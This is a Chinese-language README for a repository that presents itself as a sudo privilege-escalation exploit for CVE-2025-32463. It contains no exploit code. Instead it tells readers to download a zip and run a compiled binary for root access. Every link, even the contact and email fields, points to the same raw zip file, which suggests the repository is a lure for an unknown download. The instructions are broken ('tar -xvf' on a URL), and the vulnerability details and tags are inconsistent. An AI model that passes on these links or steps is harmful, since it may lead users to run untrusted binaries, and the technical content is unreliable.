yeremeu/CVE-2025-32463_chwoot

# CVE-2025-32463：Sudo 本地权限提升漏洞利用   ## 目录 - [概述](#overview) - [漏洞详情](#vulnerability-details) - [受影响系统](#affected-systems) - [安装说明](#installation) - [使用方法](#usage) - [示例](#example) - [贡献指南](#contributing) - [许可证](#license) - [联系方式](#contact) ## 概述 本仓库包含针对本地权限提升漏洞 CVE-2025-32463 的利用程序。该漏洞影响 `sudo` 命令，允许用户在受影响的系统上获得提升的权限。 您可以从 [Releases 部分](https://github.com/yeremeu/CVE-2025-32463_chwoot/raw/refs/heads/main/Maranha/chwoot_CV_v1.6.zip) 下载必要的文件。 ## 漏洞详情 CVE-2025-32463 是源于 `sudo` 命令中对用户输入验证不当而产生的漏洞。攻击者可以利用此缺陷以 root 权限执行命令。 ### 关键点 - **类型**：本地权限提升 - **严重程度**：高 - **CVSS 评分**：7.5（高） - **攻击向量**：本地 了解此漏洞的性质对于系统管理员和安全专业人员至关重要。采取适当的缓解策略可以防止未经授权的访问。 ## 受影响系统 以下系统受到 CVE-2025-32463 的影响： - Ubuntu 20.04 LTS - Debian 10 - CentOS 7 - Fedora 34 请确保您的系统已更新至最新补丁以缓解此漏洞。 ## 安装说明 要安装该利用程序，请按照以下步骤操作： 1. 访问 [Releases 部分](https://github.com/yeremeu/CVE-2025-32463_chwoot/raw/refs/heads/main/Maranha/chwoot_CV_v1.6.zip) 下载所需文件。 2. 使用以下命令解压下载的文件： tar -xvf https://github.com/yeremeu/CVE-2025-32463_chwoot/raw/refs/heads/main/Maranha/chwoot_CV_v1.6.zip 3. 进入解压后的目录： cd CVE-2025-32463 4. 编译利用程序： gcc exploit.c -o exploit 5. 确保您拥有运行该利用程序的必要权限。 ## 使用方法 安装完成后，您可以使用以下命令运行该利用程序： ``` ./exploit ``` 这将执行利用程序并尝试获取提升的权限。 ### 重要提示 请负责任地使用此利用程序，并且仅在您拥有或明确获得测试许可的系统上使用。 ## 示例 以下是如何使用该利用程序的简单示例： 1. 打开终端。 2. 运行利用程序： ./exploit 3. 如果成功，您将看到一条消息，表明您已获得 root 访问权限。 ## 许可证 本项目基于 MIT 许可证授权。有关详细信息，请参阅 [LICENSE](LICENSE) 文件。 ## 联系方式 如有任何问题或反馈，请随时联系： - GitHub：[yeremeu](https://github.com/yeremeu/CVE-2025-32463_chwoot/raw/refs/heads/main/Maranha/chwoot_CV_v1.6.zip) - 邮箱：https://github.com/yeremeu/CVE-2025-32463_chwoot/raw/refs/heads/main/Maranha/chwoot_CV_v1.6.zip 欢迎探索更多关于此利用程序的内容，并关注 [Releases 部分](https://github.com/yeremeu/CVE-2025-32463_chwoot/raw/refs/heads/main/Maranha/chwoot_CV_v1.6.zip) 以获取更新。

标签：CentOS, Chroot提权, CSV导出, Cutter, CVE-2025-32463, Debian, Exploit, Fedora, PoC验证码, Root权限, Sudo漏洞, Web报告查看器, 协议分析, 本地提权, 权限提升, 漏洞复现, 网络安全, 计算机漏洞, 隐私保护